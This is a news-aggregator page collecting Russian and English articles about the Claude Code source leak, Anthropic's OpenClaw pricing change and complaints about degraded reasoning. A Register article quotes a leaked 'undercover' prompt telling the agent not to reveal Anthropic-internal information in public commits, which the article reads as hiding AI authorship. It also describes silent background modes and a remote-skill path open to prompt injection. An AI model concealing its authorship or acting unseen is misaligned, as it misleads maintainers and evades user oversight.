|
S
|
Утекли исходники Claude Code |
habr_ai |
31.03.2026 14:00 |
1
|
| Embedding sim. | 1 |
| Entity overlap | 1 |
| Title sim. | 1 |
| Time proximity | 1 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
Anthropic забыли добавить *.map в .npmignore — и весь исходный код Claude Code оказался в открытом доступе через npm. Тамагочи в терминале, система снов для консолидации памяти, режим прикрытия для коммитов в open-source, 30-минутные сессии планирования на удалённом Opus 4.6, мультиагентный рой с координатором — и всё это спрятано за feature flags, которые source map’ы радостно проигнорировали. Разбираем, что нашлось внутри.
Круто! Читать далее
|
|
|
[Перевод] Claude Code для тех, кто не пишет код: полный гайд для старта |
habr_ai |
05.04.2026 06:20 |
0.84
|
| Embedding sim. | 0.9432 |
| Entity overlap | 0.6 |
| Title sim. | 0.6154 |
| Time proximity | 0.3541 |
| NLP тип | other |
| NLP организация | |
| NLP тема | developer tools |
| NLP страна | |
Открыть оригинал
Большинство воспринимает Claude Code как инструмент исключительно для разработчиков. Но на практике это один из самых мощных инструментов персональной автоматизации — и пользоваться им можно вообще без навыков программирования.
С момента выхода Claude Code в начале 2025 года я использую его для ведения базы знаний, обработки заметок со встреч, учёта фильмов и сериалов, а также автоматизации рабочих и бытовых процессов.
Да, иногда — и для программирования. Но это уже не тема этого гайда.
Разберёмся, с чего начать
|
|
|
Anthropic says Claude Code subscribers will need to pay extra for OpenClaw usage | TechCrunch |
techcrunch |
04.04.2026 16:32 |
0.82
|
| Embedding sim. | 0.9046 |
| Entity overlap | 0.3889 |
| Title sim. | 0.4138 |
| Time proximity | 0.9008 |
| NLP тип | regulation |
| NLP организация | Anthropic |
| NLP тема | developer tools |
| NLP страна | United States |
Открыть оригинал
It’s about to become more expensive for Claude Code subscribers to use Anthropic’s coding assistant with OpenClaw and other third-party tools.
According to a customer email shared on Hacker News , Anthropic said that starting at noon Pacific on April 4 (today), subscribers will “no longer be able to use your Claude subscription limits for third-party harnesses including OpenClaw.” Instead, they’ll need to pay for extra usage through “a pay-as-you-go option billed separately from your subscription.”
The company said that while it’s starting with OpenClaw today, the policy “applies to all third-party harnesses and will be rolled out to more shortly.”
Anthropic’s head of Claude Code Boris Cherny wrote on X that the company’s “subscriptions weren’t built for the usage patterns of these third-party tools” and that Anthropic is now trying “to be intentional in managing our growth to continue to serve our customers sustainably long-term.”
The announcement comes after OpenClaw creator Peter Steinberger said he was joining Anthropic rival OpenAI , with OpenClaw continuing as an open source project with support from OpenAI.
Steinberger posted that he and OpenClaw board member Dave Morin “tried to talk sense into Anthropic” but were only able to delay the increased pricing by a week.
“Funny how timings match up, first they copy some popular features into their closed harness, then they lock out open source,” Steinberger said.
Techcrunch event
Disrupt 2026: The tech ecosystem, all in one room
Your next round. Your next hire. Your next breakout opportunity. Find it at TechCrunch Disrupt 2026, where 10,000+ founders, investors, and tech leaders gather for three days of 250+ tactical sessions, powerful introductions, and market-defining innovation. Register now to save up to $400.
Save up to $300 or 30% to TechCrunch Founder Summit
1,000+ founders and investors come together at TechCrunch Founder Summit 2026 for a full day focused on growth, execution, and real-world scaling. Learn from founders and investors who have shaped the industry. Connect with peers navigating similar growth stages. Walk away with tactics you can apply immediately
Offer ends March 13.
San Francisco, CA
|
October 13-15, 2026
REGISTER NOW
Cherny, however, insisted that Claude Code team members are “big fans of open source” and that he himself “just put up a few [pull requests] to improve prompt cache efficiency for OpenClaw specifically.”
“This is more about engineering constraints,” he said, adding that Anthropic is still offering full refunds for subscribers. “We know not everyone realized this isn’t something we support, and this is an attempt to make it clear and explicit.”
Meanwhile, OpenAI recently shut down its Sora app and video generation models , reportedly to free up computing resources and as part of a broader effort to refocus on winning over software engineers and enterprises that are increasingly relying on products like Claude Code.
Topics
AI , Anthropic , claude code , openclaw , Peter Steinberger , Startups
Anthony Ha
Anthony Ha is TechCrunch’s weekend editor. Previously, he worked as a tech reporter at Adweek, a senior editor at VentureBeat, a local government reporter at the Hollister Free Lance, and vice president of content at a VC firm. He lives in New York City.
You can contact or verify outreach from Anthony by emailing anthony.ha@techcrunch.com .
View Bio
April 30
San Francisco, CA
StrictlyVC kicks off the year in SF. Get in the room for unfiltered fireside chats with industry leaders, insider VC insights, and high-value connections that actually move the needle. Tickets are limited.
REGISTER NOW
Most Popular
Anthropic says Claude Code subscribers will need to pay extra for OpenClaw usage
Anthony Ha
Anthropic took down thousands of GitHub repos trying to yank its leaked source code — a move the company says was an accident
Tim Fernholz
The reputation of troubled YC startup Delve has gotten even worse
Julie Bort
Anthropic is having a month
Connie Loizos
Google is now letting users in the US change their Gmail address
Ivan Mehta
Allbirds is selling for $39M. It raised nearly 10 times that amount in its IPO.
Connie Loizos
Why OpenAI really shut down Sora
Connie Loizos
Loading the next article
Error loading the next article
X
LinkedIn
Facebook
Instagram
youTube
Mastodon
Threads
Bluesky
TechCrunch
Staff
Contact Us
Advertise
Crunchboard Jobs
Site Map
Terms of Service
Privacy Policy
RSS Terms of Use
Code of Conduct
Kalshi
Copilot
Blue Origin
WordPress
Bezos
Tech Layoffs
ChatGPT
© 2026 TechCrunch Media LLC.
|
|
|
Claude Code leak exposes a Tamagotchi-style ‘pet’ and an always-on agent |
the_verge_ai |
31.03.2026 22:24 |
0.799
|
| Embedding sim. | 0.9058 |
| Entity overlap | 0.25 |
| Title sim. | 0.2472 |
| Time proximity | 0.9681 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
After Anthropic released Claude Code's 2.1.88 update , users quickly discovered that it contained a package with a source map file containing its TypeScript codebase, with one person on X calling attention to the leak and posting a file containing the code. The leaked data reportedly contains more than 512,000 lines of code and provides a look into the inner workings of the AI-powered coding tool, as reported earlier by Ars Technica and VentureBeat .
Users who have dug into the code claim to have uncovered upcoming features, Anthropic's instructions for the AI bot , and insight into its "memory" architecture . Some things spotted by users inclu …
Read the full story at The Verge.
|
|
|
Anthropic closes door on subscription use of OpenClaw |
the_register_ai |
06.04.2026 19:37 |
0.77
|
| Embedding sim. | 0.9039 |
| Entity overlap | 0.2105 |
| Title sim. | 0.28 |
| Time proximity | 0.5967 |
| NLP тип | regulation |
| NLP организация | Anthropic |
| NLP тема | large language models |
| NLP страна | United States |
Открыть оригинал
AI + ML
8
Anthropic closes door on subscription use of OpenClaw
8
The company is having trouble meeting user demand
Thomas Claburn
Mon 6 Apr 2026 //
19:37 UTC
OpenClaw is popular, but not with the people responsible for keeping Anthropic’s services online. The company has disallowed subscription-based pricing for users who use the open-source agentic tool with Claude to try to keep things moving.
Probably not because of OpenClaw, Claude was struggling on Monday with degraded service following further efforts to balance capacity with demand.
"We have identified an issue resulting in elevated errors on Claude.ai, including desktop and mobile," the company's status page said, characterizing the incident as "a partial outage." Uptime over the past 90 days slipped to 98.82 percent.
An Anthropic spokesperson did not immediately have an answer as to the source of the issue. But the disruption did not last long.
"From 15:00–16:30 UTC on April 6, we saw elevated errors on login for Claude.ai and Claude Code," the company's status page said. "This issue also affected some Claude.ai conversations and other product functionality such as voice mode. This issue is now resolved."
The service disruption follows a period of high demand for Claude, one that the company has tried to address by denying access to third-party tools that use the AI service through subscriptions. On Friday, Boris Cherny, head of Claude Code, said , "Starting tomorrow at 12pm PT, Claude subscriptions will no longer cover usage on third-party tools like OpenClaw."
Cherny explained that the restriction followed from engineering constraints. "Our systems are highly optimized for one kind of workload, and to serve as many people as possible with the most intelligent models, we are continuing to optimize that," he said .
He nonetheless insisted, "We're big fans of open source. I actually just put up a few [pull requests] to improve prompt cache efficiency for OpenClaw specifically."
Google in February took similar action to enforce its terms of service related to its Antigravity AI development environment, Gemini CLI, and Gemini Code Assist. "Using third-party software, tools, or services to harvest or piggyback on Gemini CLI's OAuth authentication to access our backend services is a direct violation of Gemini CLI's applicable terms and policies," said Jack Wotherspoon, Gemini CLI developer relations, at the time.
Anthropic sells AI service tokens through either subscriptions or its API. Subscribers pay a flat rate and are subject to session and monthly usage limits, with an option to pay for extra usage once capped. API customers pay per token, with no usage limits. For developers who use Claude heavily, subscription-based pricing can be significantly less expensive.
For this reporter during the month of March, a $20 monthly subscription enabled about $236 of token usage (which doesn't necessarily reflect the actual per token cost to Anthropic). Others report similarly skewed ratios when price paid is compared to list price value or more – 36x by one measure . This would presumably be balanced somewhat by developers who pay for underutilized subscriptions. But as Anthropic works toward going public, the company has an incentive to ensure its customer acquisition strategy doesn't lead customers toward rival products or magnify costs.
AI agents promise to 'run the business,' but who is liable if things go wrong?
PrismML debuts energy-sipping 1-bit LLM in bid to free AI from the cloud
Researchers didn't want to glamorize cybercrims. So they roasted them
Netflix - yes Netflix - jumps on the AI bandwagon with video editor
The developer community has long been aware of the price advantage of Claude subscriptions and many subscribers have chosen to use third-party harnesses (e.g. OpenCode, Pi) to interact with Claude Code.
Unfortunately, Anthropic has had trouble keeping up with demand. In February, the biz reaffirmed its preexisting policy forbidding the use of third-party harnesses with Claude subscriptions. This was around the time OpenClaw, an AI agent platform intended to operate autonomously 24/7, began attracting attention.
In late March, Anthropic implemented another strategy to balance demand and capacity: It changed the way subscription usage was calculated so that customers burned through their usage limits faster during peak hours.
As of April 4, 2026, Anthropic went from policy warnings to billing-based enforcement.
"Starting April 4, third-party tools will draw from extra usage instead of subscription limits," an Anthropic spokesperson said in a statement provided to The Register . "Using Claude subscriptions with third-party tools isn't permitted under our Terms of Service, and they put an outsized strain on our systems. Capacity is something we manage thoughtfully, and we need to prioritize customers using our core products."
Claude subscriptions continue to apply to Claude.ai, Claude Code, and Cowork.
Anthropic attempted to mitigate the ill will generated by the move – announced only one day before implementation – by offering subscribers a month of extra usage credit based on their monthly plan. The company is also offering extra usage bundles at 30 percent off. And if that's unsatisfactory, customers have the option to cancel their plan and receive a refund.
Customers can still use Claude with third-party tools through extra usage bundles (purchased through the Claude account page) or by using an API key.
"We've been working hard to meet the increase in demand for Claude, and our subscriptions weren't built for the usage patterns of these third-party tools," Cherny explained . "Capacity is a resource we manage thoughtfully and we are prioritizing our customers using our products and API."
Capacity is a resource that may continue to be scarce if demand continues to grow. Bloomberg recently reported that more than half of the US datacenters planned to open this year will face delays. ®
Share
More about
AI
Anthropic
Development
More like these
×
More about
AI
Anthropic
Development
Software
Narrower topics
Accessibility
AdBlock Plus
AIOps
App
Application Delivery Controller
Audacity
Claude
Confluence
Database
DeepSeek
Devops
FOSDEM
FOSS
Gemini
Google AI
GPT-3
GPT-4
Grab
Graphics Interchange Format
IDE
Image compression
Jenkins
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
Neural Networks
NLP
OpenOffice
Programming Language
QR code
Retrieval Augmented Generation
Retro computing
Search Engine
Software Bill of Materials
Software bug
Software License
Star Wars
Tensor Processing Unit
Text Editor
TOPS
User interface
Visual Studio
Visual Studio Code
WebAssembly
Web Browser
WordPress
Broader topics
Large Language Model
Self-driving Car
More about
Share
8
COMMENTS
More about
AI
Anthropic
Development
More like these
×
More about
AI
Anthropic
Development
Software
Narrower topics
Accessibility
AdBlock Plus
AIOps
App
Application Delivery Controller
Audacity
Claude
Confluence
Database
DeepSeek
Devops
FOSDEM
FOSS
Gemini
Google AI
GPT-3
GPT-4
Grab
Graphics Interchange Format
IDE
Image compression
Jenkins
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
Neural Networks
NLP
OpenOffice
Programming Language
QR code
Retrieval Augmented Generation
Retro computing
Search Engine
Software Bill of Materials
Software bug
Software License
Star Wars
Tensor Processing Unit
Text Editor
TOPS
User interface
Visual Studio
Visual Studio Code
WebAssembly
Web Browser
WordPress
Broader topics
Large Language Model
Self-driving Car
TIP US OFF
Send us news
|
|
|
Что утечка исходного кода Claude Code показала о будущем AI-агентов |
habr_ai |
09.04.2026 09:45 |
0.764
|
| Embedding sim. | 0.8644 |
| Entity overlap | 0.7143 |
| Title sim. | 0.2761 |
| Time proximity | 0.5904 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | code generation |
| NLP страна | |
Открыть оригинал
31 марта Anthropic случайно раскрыла крупную часть исходного кода Claude Code через публичный npm-пакет .
Но главный сюжет тут не сама утечка, а то, что она показала: Claude Code - это уже не просто AI-инструмент для программирования, а заготовка под более сложные агентные системы с памятью, фоновыми режимами и скрытыми feature-флагами.
Разбираем, что нашли разработчики в 512 тысячах строк кода.
Читать далее
|
|
|
Claude Code's innards revealed as source code leaked online |
the_register_ai |
06.04.2026 00:02 |
0.761
|
| Embedding sim. | 0.9236 |
| Entity overlap | 0.4286 |
| Title sim. | 0.225 |
| Time proximity | 0.244 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
AI + ML
5
Anthropic sure has a mess on its hands thanks to that Claude Code source leak
5
Pay no attention to that code behind the curtain, says Anthropic as it scrambles to defend its IPO
Brandon Vigliarolo
Mon 6 Apr 2026 //
00:02 UTC
Kettle When it comes to circling up for this week's Kettle, what is there to discuss but Anthropic's accidental release of Claude Code's source code?
People have peered behind Claude Code's curtain before, but never like this: Prior attempts to understand how the AI software development assistant worked typically required reverse-engineering or sussing out small snippets of code. This time Anthropic simply left the stage door open with the entire Claude Code source ready and waiting for the right person to find itt. And find it they did on March 31.
Tom Claburn and Jessica Lyons join Brandon Vigliarolo this week to chat about what exactly happened that caused all of Claude Code's … uh … code to leak, the security implications thereof, and just what sort of surprises have already been uncovered among the 512,000+ lines of code Anthropic handed the world last week.
You can listen to The Kettle here , as well as on Spotify and Apple Music . ®
Share
More about
Anthropic
Claude
Developer
More like these
×
More about
Anthropic
Claude
Developer
Kettle
Narrower topics
API
Git
Programming Language
Software bug
Broader topics
Large Language Model
More about
Share
5
COMMENTS
More about
Anthropic
Claude
Developer
More like these
×
More about
Anthropic
Claude
Developer
Kettle
Narrower topics
API
Git
Programming Language
Software bug
Broader topics
Large Language Model
TIP US OFF
Send us news
|
|
|
Ну‑ка, посмотрим, что там у Claude Code… |
habr_ai |
01.04.2026 13:23 |
0.758
|
| Embedding sim. | 0.8677 |
| Entity overlap | 0.25 |
| Title sim. | 0.2115 |
| Time proximity | 0.8608 |
| NLP тип | other |
| NLP организация | |
| NLP тема | code generation |
| NLP страна | |
Открыть оригинал
31 марта 2026 года наружу буквально вывалились исходники Claude Code ( через sourcemap в npm‑пакете ). История уже сама по себе комичная: продукт, который помогает писать код и в теории должен быть особенно аккуратен с публикацией артефактов, случайно публикует не просто кусок дебажной информации, а почти анатомический атлас самого себя.
Но меня в этой истории интересует не столько сам факт утечки, сколько более приземлённый вопрос: что там внутри? Если убрать обычное для таких случаев «вау, утекло», остаётся более интересная интонация: ну‑ка, посмотрим, что тут у нас (или «там у них»?) и нормально ли там написан код.
Да, написано с головой
|
|
|
Claude Code has become dumber, lazier: AMD director |
the_register_ai |
06.04.2026 20:27 |
0.757
|
| Embedding sim. | 0.867 |
| Entity overlap | 0.3571 |
| Title sim. | 0.1548 |
| Time proximity | 0.8785 |
| NLP тип | other |
| NLP организация | AMD |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
AI + ML
15
AMD's AI director slams Claude Code for becoming dumber and lazier since last update
15
'Claude cannot be trusted to perform complex engineering tasks' according to GitHub ticket
Brandon Vigliarolo
Mon 6 Apr 2026 //
20:27 UTC
If you've noticed Claude Code's performance degrading to the point where you find you don't trust it to handle complicated tasks anymore, you're not alone.
A GitHub issue was filed on Friday by user stellaraccident. That user's Github profile and a related LinkedIn post identify the poster as Stella Laurenzo, the director of the AI group at chipmaker AMD. She complains that, ever since some time in February, Claude Code has really been phoning it in.
"Claude cannot be trusted to perform complex engineering tasks," Laurenzo wrote, noting that her team reached that conclusion by referring to months of logs from the "very consistent, high complexity work environment" in which they use Claude Code. "Every senior engineer on my team has reported similar experiences/anecdotes," Laurenzo added.
Based on comments in the issue thread, plenty of others are feeling the same way, and Reddit commenters have expressed similar sentiments.
To reach this conclusion, Laurenzo and her team analyzed 6,852 Claude Code sessions incorporating 234,760 tool calls and 17,871 thinking blocks. According to their data, the number of stop-hook violations used to catch ownership dodging, premature cessation of the thinking process, and permission-seeking behavior that indicate "laziness" all skyrocketed, going from zero prior to the 8th of March to 10 per day on average through the end of last month.
The number of times Claude would read through a piece of code before making changes also dropped drastically, going from 6.6 reads on average to just 2 by the end of March, while over the same period, Claude began rewriting entire files instead of making edits with much greater frequency.
All of those things, said Laurenzo, point to Claude Code not thinking as deeply, and coincide with the early March deployment of thinking content redaction with Claude Code version 2.1.69. Thinking redaction functions as a header that defaults to stripping thinking content from Claude Code API responses, meaning users don't get any idea what Claude Code is actually doing while it reflects on a request.
The evidence, according to Lorenzo, points to a general thinking reduction since the implementation.
"When thinking is shallow, the model defaults to the cheapest action available: edit without reading, stop without finishing, dodge responsibility for failures, take the simplest fix rather than the correct one," the GitHub issue explains. "These are exactly the symptoms observed."
If you're wondering, this appears to be a separate issue from the issue Claude Code users cried foul about back in February when version 2.1.20 of the bot caused it to truncate its explanation of what it was reading as part of its thinking process.
In that instance, which led many Claude Code users to decry that it was evidence the AI was being dumbed down, users were left with just a brief line indicating how many files were read with little more specificity than that. We can't imagine those same developers will be very happy about this latest development.
Anthropic has also caught flak for unexplained surges in token usage that have pushed some users past their limits, leaving them unable to use the product. Add to that the recent exposure of Claude Code's entire source code, and it's not looking good for the AI firm.
For Laurenzo's part, she wants Anthropic to be transparent about whether it's reducing or capping thinking tokens and causing Claude Code to vomit garbage. At the very least, she wants Claude to expose the number of thinking tokens being used per request to let users "monitor whether their requests are getting the reasoning depth they need."
Laurenzo also asked for a max thinking tier to be added to Anthropic's offerings for engineers running complex workflows. "The current subscription model doesn't distinguish between users who need 200 thinking tokens per response and users who need 20,000," the AMD AI chief explained. "Users running complex engineering workflows would pay significantly more for guaranteed deep thinking."
Claude Code source leak reveals how much info Anthropic can hoover up about you and your system
Using AI to code does not mean your code is more secure
Anthropic sure has a mess on its hands thanks to that Claude Code source leak
Claude Code's prying AIs read off-limits secret files
"We have switched to another provider which is doing superior quality work, but Claude has been good to us, and we are leaving this in the hopes that Anthropic can fix their product," Laurenzo explained, while declining to go into details in a comment citing NDAs about whatever new tool her team is using. That said, Laurenzo did warn Anthropic that it's still early in the AI coding game and Anthropic is looking at giving up the top spot if its behavior continues.
"All I will add is that 6 months ago, Claude stood alone in terms of reasoning quality and execution," Laurenzo added in a response on the issue thread. "But the others need to be watched and evaluated very carefully. Anthropic is far from alone at the capability tier that Opus previously occupied."
Neither Anthropic nor Laurenzo initially responded to questions for this story. ®
Share
More about
AI
Anthropic
Claude
More like these
×
More about
AI
Anthropic
Claude
Developer
GitHub
Narrower topics
AIOps
API
DeepSeek
Gemini
Google AI
GPT-3
GPT-4
Machine Learning
MCubed
Neural Networks
NLP
Programming Language
Retrieval Augmented Generation
Software bug
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Git
Large Language Model
Self-driving Car
More about
Share
15
COMMENTS
More about
AI
Anthropic
Claude
More like these
×
More about
AI
Anthropic
Claude
Developer
GitHub
Narrower topics
AIOps
API
DeepSeek
Gemini
Google AI
GPT-3
GPT-4
Machine Learning
MCubed
Neural Networks
NLP
Programming Language
Retrieval Augmented Generation
Software bug
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Git
Large Language Model
Self-driving Car
TIP US OFF
Send us news
|
|
|
Claude Code's source reveals extent of system access |
the_register_ai |
01.04.2026 07:00 |
0.756
|
| Embedding sim. | 0.8505 |
| Entity overlap | 0.1481 |
| Title sim. | 0.3151 |
| Time proximity | 0.9169 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | developer tools |
| NLP страна | United States |
Открыть оригинал
Devops
16
Claude Code source leak reveals how much info Anthropic can hoover up about you and your system
16
If you loved the data retention of Microsoft Recall, you'll be thrilled with Claude Code
Thomas Claburn
Wed 1 Apr 2026 //
07:00 UTC
Anthropic's Claude Code lacks the persistent kernel access of a rootkit. But an analysis of its code shows that the agent can exercise far more control over people's computers than even the most clear-eyed reader of contractual terms might suspect. It retains lots of your data and is even willing to hide its authorship from open-source projects that reject AI.
The leak of the company's client source code – details of which have been circulating for many months among those who reverse-engineered the binary – reveals that Claude Code pretty much has the run of any device where it's installed.
Concerns about that came up in court recently in Anthropic's lawsuit against the US Defense Department (Anthropic PBC v. U.S. Department of War et al) for banning the company's AI services following the company's refusal to compromise model safeguards.
As part of its justification for declaring Anthropic a supply chain threat, the US government argued [PDF], there was "substantial risk that Anthropic could attempt to disable its technology or preemptively and surreptitiously alter the behavior of the model in advance or in the middle of ongoing warfighting operations..."
Anthropic disputed that claim in a court filing. "That assertion is unmoored from technical reality: 'Anthropic does not have the access required to disable [its] technology or alter [its] model's behavior before or during ongoing operations,' it wrote, quoting Thiyagu Ramasamy, head of public sector at Anthropic, in a deposition. "Once deployed in classified environments, Anthropic has no access to (or control over) the model."
In a classified environment, that's credible under certain conditions. For everyone else, Claude has vast powers.
What Claude Code could do in a classified environment
The Register consulted a security researcher who asked to be referred to by the pseudonym "Antlers" to analyze the source for Claude Code.
It appears a government agency like the Defense Department could prevent Claude Code from phoning home or taking remote action by making sure all of the following are true:
Ensure inference transits flow via Amazon Bedrock GovCloud or Google AI for Public Sector (Vertex).
Block data gathering endpoints (Statsig/GrowthBook/Sentry) with a firewall.
Block system prompt fingerprinting (via Bedrock, etc).
Prevent automatic updates via version pinning and blocking update endpoints.
Disable autoDream, an unreleased background agent being tested that's capable of reading all session transcripts.
Anthropic says that’s not an issue because it designs for privacy and security from the ground up and that Claude Code itself is SOC2 compliant.
“When using third party inference (AWS, Vertex, Azure), we disable all traffic except calls to those inference providers automatically. We also offer a 1-setting switch for anyone to do the same, also clearly documented here ,” the company said.
Settings that limit remote communication include:
CLAUDE_CODE_DISABLE_AUTO_MEMORY=1, which disables all memory and telemetry write operations.
CLAUDE_CODE_SIMPLE (--bare mode), which strips memory and autoDream entirely.
ANTHROPIC_BASE_URL can be used to reroute API calls to a private endpoint
ANTHROPIC_UNIX_SOCKET routes authentication through a forwarded socket (the ssh tunnel mode).
The remote managed settings (policySettings) can lock down behavior for enterprise deployments, though not entirely.
According to Ramasamy, Anthropic hands off model administration to a government customer like the Defense Department. Model updates, with new or removed capabilities, would have to be negotiated.
"Anthropic personnel cannot, for example, log into a DoW system to modify or disable the models during an operation; the technology simply does not function that way," he said in a March 20, 2026 declaration. "In these deployments, only the government and its authorized cloud provider have access to the running system. Anthropic's role is limited to providing the model itself and delivering updates only if and when requested or approved by the customer."
Even so, Anthropic can exert some degree of control based on the usage terms in the applicable contract.
What Claude Code could do to everybody else
For everyone not using a version of Claude Code that's tied to a firewalled public sector cloud or is somehow air gapped, Anthropic has far more access.
Anthropic admits Claude Code users hitting usage limits 'way faster than expected'
Anthropic goes nude, exposes Claude Code source by accident
Leaked memo suggests Red Hat's chugging the AI Kool-Aid
UK watchdog targets Microsoft licensing in cloud competition probe
Just as a starting point, Claude users should know that Anthropic receives user prompts and responses that pass through its API, conversations that can reveal not only what was said but file contents and system details.
Yet there are many more ways that the company can potentially receive or collect information, based on the Claude Code source. These include:
KAIROS (src/bootstrap/state.ts:72), a daemon (background process) set by the kairosActive flag. It appears to be an unreleased headless "assistant mode" for when the user is not watching the terminal user interface (TUI). It gets rid of the status bar (StatusLine.tsx:33), disables planning mode, silently suppresses the AskUserQuestion tool (AskUserQuestionTool.tsx:141). It auto-backgrounds long-running bash commands without notice (BashTool.tsx:976).
CHICAGO, is the codename for computer use and desktop control. Users must opt in to activate the service. It enables the Claude agent to carry out mouse clicks, perform keyboard input, access the clipboard, and capture screenshots. It's publicly launched and available to Pro/Max subscribers and Anthropic employees (designated by the "ant" flag). There's also a separate publicly-launched Claude in Chrome service that supports browser automation and all the system access that entails.
Persistent telemetry. Initially this was done via Statsig, which was acquired by rival OpenAI last September, presumably triggering the switch to GrowthBook, a platform that supports A/B testing and analytics. When Claude is launched, the analytics service (firstPartyEventLoggingExporter.ts) phones home with the following data, or saves it to ~/.claude/telemetry/ if the network is down: user ID, session ID, app version, platform, terminal type, Organization UUID, account UUID, email address if defined, and which feature gates are currently enabled. Telemetry is enabled by default under the Claude API and disabled by default with third-party providers (Bedrock, Vertex, Foundry).
Remotely managed settings (remoteManagedSettings/index.ts), which opt-in for organizations. For enterprise customers, Anthropic maintains a server that can push a policySettings object that can: override other items in the merge chain; is polled hourly without user interaction; can set .env variables (e.g. ANTHROPIC_BASE_URL, LD_PRELOAD, PATH); and these settings take effect immediately via hot reload (settingsChangeDetector.notifyChange). Users are prompted when there's a "dangerous setting change," but the definition of that term follows from Anthropic's code and thus could be revised. Routine changes (permissions, .env variables, feature flags appear to happen without notification).
Auto-updater. The auto-updater (autoUpdater.ts:assertMinVersion()), runs every launch, pulls the configuration version from Statsig/GrowthBook. So Anthropic can remove or disable specific versions by choice.
Error reporting. When there's an unhandled exception, the error reporting script (sentry.ts) captures the current working directory, potentially showing project names, paths, and other system information. It also reports feature gates active, user ID, email, session ID, and platform information. While Anthropic's website cites the use of Sentry , the company claims, "We do not currently use Sentry. When we used Sentry in the past, we did not send sensitive data like file path or PII, and approached the problem with defense-in-depth, using Sentry's server-side data scrubbing functionality. It was also automatically disabled for third party inference providers, and is something people could opt of when using Anthropic API."
Payload Size Telemetry. The API call tengu_api_query transmits the messageLength, the JSON-serialized byte length of the system prompt, messages, and tool schemas.
autoDream. Publicly discussed but not officially released, the autoDream service spawns a background subagent that searches (greps) through all JSONL session transcripts to consolidate memories (stored data Claude uses as context for queries). The agent runs in the same process as Claude (under the same API key, with the same network access) and its scan is local. But whatever it writes to MEMORY.md gets injected back into future system prompts and would thus be sent to the API.
Team Memory Sync, an unreleased internal project. There's a bidirectional sync service (src/services/teamMemorySync/index.ts) that connects local memory files to api.anthropic.com/api/claude_code/team_memory. It provides a way to share memories with other team members within an organization. The service includes a secret scanner (secretSanner.ts) that uses regex patterns for around 40 known token and API key patterns (AWS, Azure, GCP, etc). But sensitive data that doesn't match these regexes might be exposed to other team members through memory sync.
Experimental Skill Search (src/tools/SkillTool/SkillTool.ts:108) is a feature flag available only to Anthropic employees. It provides a way to download skill definitions to a remote server (remoteSkillLoader.js); track which remote skills have been used in a session (remoteSkillState.js); execute remotely-downloaded skills (executeRemoteSkill() at line 969); and register skills so they persist after a compact operation. If enabled for non-employee accounts (via GrowthBook feature flag flip, for example), this would be a theoretical remote code execution pathway. Anthropic, or whoever controls the skill search backend, could serve arbitrary prompt injections or instruction overrides in the form of "skills" that get loaded and run in a session.
Other capabilities have been documented at ccleaks.com .
"I don't think people realize that every single file Claude looks at gets saved and uploaded to Anthropic," the researcher "Antlers" told us. "If it's seen a file on your device, Anthropic has a copy."
For Free/Pro/Max customers, Anthropic retains this data either for five years, if the user has chosen to share data for model training, or for 30 days if not. Commercial users (Team, Enterprise, and API) have a standard 30 day retention period and a zero-data retention option.
For those who recall the debate surrounding Microsoft Recall not long ago, Claude Code's capture of activity is similar. Every read tool call, every Bash tool call, every search (grep) result, and every edit/write of old and new content gets stored locally in plaintext as a JSONL file.
The Claude's autoDream agent, once officially released, will search through those and extract data to store in MEMORY.md, which then gets injected to future system prompts and thus hits the API.
One of the more curious details to emerge from the publication of Claude Code's source is that Anthropic tries to hide AI authorship from contributions to public code repositories – possibly a response to the open source projects that have disallowed AI code contributions. Prompt instructions in a file called undercover.ts state, "You are operating UNDERCOVER in a PUBLIC/OPEN-SOURCE repository. Your commit messages, PR titles, and PR bodies MUST NOT contain ANY Anthropic-internal information. Do not blow your cover."
Mysterious Melon Mode
There's also a mystery: The current source code lacks a feature called "Melon Mode" that was present in prior reverse engineered versions of the software.
This was behind an Anthropic employee feature flag and only ran internally, not on production builds. A comment attached to the associated code check read, "Enable melon mode for ants if --melon is passed."
"Antlers" speculated that "Melon Mode" might be the code name for a headless agent mode.
When asked specifically about the function of "Melon Mode," Anthropic only noted that the company regularly tests various prototype services, not all of which make it into production. ®
Editor's note: This story has been corrected based on feedback from Anthropic.
Share
More about
AI
Anthropic
More like these
×
More about
AI
Anthropic
Narrower topics
AIOps
Claude
DeepSeek
Gemini
Google AI
GPT-3
GPT-4
Machine Learning
MCubed
Neural Networks
NLP
Retrieval Augmented Generation
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Large Language Model
Self-driving Car
More about
Share
16
COMMENTS
More about
AI
Anthropic
More like these
×
More about
AI
Anthropic
Narrower topics
AIOps
Claude
DeepSeek
Gemini
Google AI
GPT-3
GPT-4
Machine Learning
MCubed
Neural Networks
NLP
Retrieval Augmented Generation
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Large Language Model
Self-driving Car
TIP US OFF
Send us news
|
|
|
Claude Code бесплатно: как использовать ии бесплатно в 2026 году |
habr_ai |
01.04.2026 22:09 |
0.752
|
| Embedding sim. | 0.8826 |
| Entity overlap | 0.1333 |
| Title sim. | 0.1395 |
| Time proximity | 0.8313 |
| NLP тип | other |
| NLP организация | OpenClaude |
| NLP тема | large language models |
| NLP страна | |
Открыть оригинал
31 марта из npm source maps утёк исходный код Claude Code. Через часы появился OpenClaude — форк с OpenAI-совместимым шимом, который позволяет подключить GPT-4o, DeepSeek, Llama через Ollama или любую модель. Разбираю, как это устроено, что реально работает, что нет, и почему «бесплатный Claude Code» — не совсем то, чем кажется.
Читать далее
|
|
|
Hackers Are Posting the Claude Code Leak With Bonus Malware |
wired |
04.04.2026 10:30 |
0.748
|
| Embedding sim. | 0.8743 |
| Entity overlap | 0.1563 |
| Title sim. | 0.2 |
| Time proximity | 0.7564 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | cybersecurity |
| NLP страна | United States |
Открыть оригинал
